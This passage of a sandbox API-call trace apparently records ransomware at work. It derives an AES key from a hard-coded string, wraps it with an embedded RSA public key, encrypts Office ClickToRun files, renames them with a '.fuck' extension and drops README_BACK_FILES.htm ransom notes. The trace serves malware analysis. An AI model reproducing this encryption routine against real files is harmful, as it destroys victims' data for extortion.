"c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.542] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.hash.gsg", dwFileAttributes=0x2) returned 0 [0235.542] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x27e8aa8) returned 1 [0235.552] CryptCreateHash (in: hProv=0x27e8aa8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0235.552] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0235.552] CryptHashData (hHash=0x27eb8a0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.552] CryptDeriveKey (in: hProv=0x27e8aa8, Algid=0x6610, hBaseData=0x27eb8a0, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x27eb920) returned 1 [0235.552] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.552] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0235.552] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x27e8c40) returned 1 [0235.554] CryptImportPublicKeyInfo (in: hCryptProv=0x27e8c40, dwCertEncodingType=0x1, pInfo=0x27970a8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27970d8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27970e0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x27eb960) returned 1 [0235.555] CryptEncrypt (in: hKey=0x27eb960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0235.555] CryptEncrypt (in: hKey=0x27eb960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e8778*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x27e8778*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0235.555] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e8778, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.555] ReadFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x275a810, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0235.555] CryptEncrypt (in: hKey=0x27eb920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275a810*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x275a810*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0235.555] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.555] CloseHandle (hObject=0xffffffff) returned 1 [0235.555] CloseHandle (hObject=0xffffffff) returned 1 [0235.555] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.hash.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.hash"), bFailIfExists=0) returned 0 [0235.556] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.hash", dwFileAttributes=0x0) returned 0 [0235.556] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.hash.gsg")) returned 0 [0235.556] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.hash"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.hash.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.hash.fuck")) returned 0 [0235.557] CryptDestroyHash (hHash=0x27eb8a0) returned 1 [0235.557] CryptDestroyKey (hKey=0x27eb920) returned 1 [0235.557] CryptReleaseContext (hProv=0x27e8aa8, dwFlags=0x0) returned 1 [0235.557] FindNextFileA (in: hFindFile=0x27ebe60, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.557] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0235.557] GetLastError () returned 0x5 [0235.557] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.man.dat")) returned 0x20 [0235.558] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.man.dat", dwFileAttributes=0x80) returned 0 [0235.558] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.558] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.man.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.559] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.man.dat.gsg", dwFileAttributes=0x2) returned 0 [0235.559] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x27e8228) returned 1 [0235.567] CryptCreateHash (in: hProv=0x27e8228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0235.567] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0235.567] CryptHashData (hHash=0x27ebb60, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.567] CryptDeriveKey (in: hProv=0x27e8228, Algid=0x6610, hBaseData=0x27ebb60, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x27ebd60) returned 1 [0235.567] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.567] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0235.567] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x27e8800) returned 1 [0235.569] CryptImportPublicKeyInfo (in: hCryptProv=0x27e8800, dwCertEncodingType=0x1, pInfo=0x2797b38*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2797b68*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2797b70*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x27eb9a0) returned 1 [0235.569] CryptEncrypt (in: hKey=0x27eb9a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0235.569] CryptEncrypt (in: hKey=0x27eb9a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e8888*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x27e8888*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0235.570] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e8888, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.570] ReadFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x275a810, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0235.570] CryptEncrypt (in: hKey=0x27ebd60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275a810*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x275a810*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0235.570] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.570] CloseHandle (hObject=0xffffffff) returned 1 [0235.570] CloseHandle (hObject=0xffffffff) returned 1 [0235.570] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.man.dat.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.man.dat"), bFailIfExists=0) returned 0 [0235.570] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.man.dat", dwFileAttributes=0x0) returned 0 [0235.570] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.man.dat.gsg")) returned 0 [0235.571] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.man.dat"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.man.dat.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.man.dat.fuck")) returned 0 [0235.571] CryptDestroyHash (hHash=0x27ebb60) returned 1 [0235.571] CryptDestroyKey (hKey=0x27ebd60) returned 1 [0235.571] CryptReleaseContext (hProv=0x27e8228, dwFlags=0x0) returned 1 [0235.571] FindNextFileA (in: hFindFile=0x27ebe60, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0235.571] FindClose (in: hFindFile=0x27ebe60 | out: hFindFile=0x27ebe60) returned 1 [0235.571] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\readme_back_files.htm")) returned 0xffffffff [0235.571] AreFileApisANSI () returned 1 [0235.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e8998, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 122 [0235.571] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.572] GetLastError () returned 0x5 [0235.572] GetLastError () returned 0x5 [0235.572] FindNextFileA (in: hFindFile=0x27ebea0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0235.572] FindClose (in: hFindFile=0x27ebea0 | out: hFindFile=0x27ebea0) returned 1 [0235.572] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\readme_back_files.htm")) returned 0xffffffff [0235.572] AreFileApisANSI () returned 1 [0235.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2aa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 112 [0235.572] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.573] GetLastError () returned 0x5 [0235.573] GetLastError () returned 0x5 [0235.573] FindNextFileA (in: hFindFile=0x27ebce0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0235.573] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x27eba20 [0235.574] FindNextFileA (in: hFindFile=0x27eba20, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0235.574] FindNextFileA (in: hFindFile=0x27eba20, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0235.574] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x27eb8a0 [0235.580] FindNextFileA (in: hFindFile=0x27eb8a0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.580] FindNextFileA (in: hFindFile=0x27eb8a0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.580] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0235.580] GetLastError () returned 0x5 [0235.580] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\masterdescriptor.en-us.xml")) returned 0x20 [0235.580] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\MasterDescriptor.en-us.xml", dwFileAttributes=0x80) returned 0 [0235.580] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\masterdescriptor.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.581] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\masterdescriptor.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.581] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\MasterDescriptor.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0235.581] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x27e8e60) returned 1 [0235.592] CryptCreateHash (in: hProv=0x27e8e60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0235.592] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0235.592] CryptHashData (hHash=0x27eb920, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.592] CryptDeriveKey (in: hProv=0x27e8e60, Algid=0x6610, hBaseData=0x27eb920, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x27eb9e0) returned 1 [0235.592] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.592] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0235.593] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x27e8b30) returned 1 [0235.595] CryptImportPublicKeyInfo (in: hCryptProv=0x27e8b30, dwCertEncodingType=0x1, pInfo=0x2797e78*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2797ea8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2797eb0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x27eba60) returned 1 [0235.595] CryptEncrypt (in: hKey=0x27eba60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0235.595] CryptEncrypt (in: hKey=0x27eba60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e8558*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x27e8558*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0235.595] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e8558, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.596] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279d798, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x279d798, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0235.596] CryptEncrypt (in: hKey=0x27eb9e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279d798*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x279d798*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0235.596] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279d798, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.596] CloseHandle (hObject=0xffffffff) returned 1 [0235.596] CloseHandle (hObject=0xffffffff) returned 1 [0235.596] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\masterdescriptor.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\masterdescriptor.en-us.xml"), bFailIfExists=0) returned 0 [0235.596] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\MasterDescriptor.en-us.xml", dwFileAttributes=0x0) returned 0 [0235.596] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\masterdescriptor.en-us.xml.gsg")) returned 0 [0235.597] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\masterdescriptor.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\MasterDescriptor.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\masterdescriptor.en-us.xml.fuck")) returned 0 [0235.597] CryptDestroyHash (hHash=0x27eb920) returned 1 [0235.597] CryptDestroyKey (hKey=0x27eb9e0) returned 1 [0235.597] CryptReleaseContext (hProv=0x27e8e60, dwFlags=0x0) returned 1 [0235.597] FindNextFileA (in: hFindFile=0x27eb8a0, 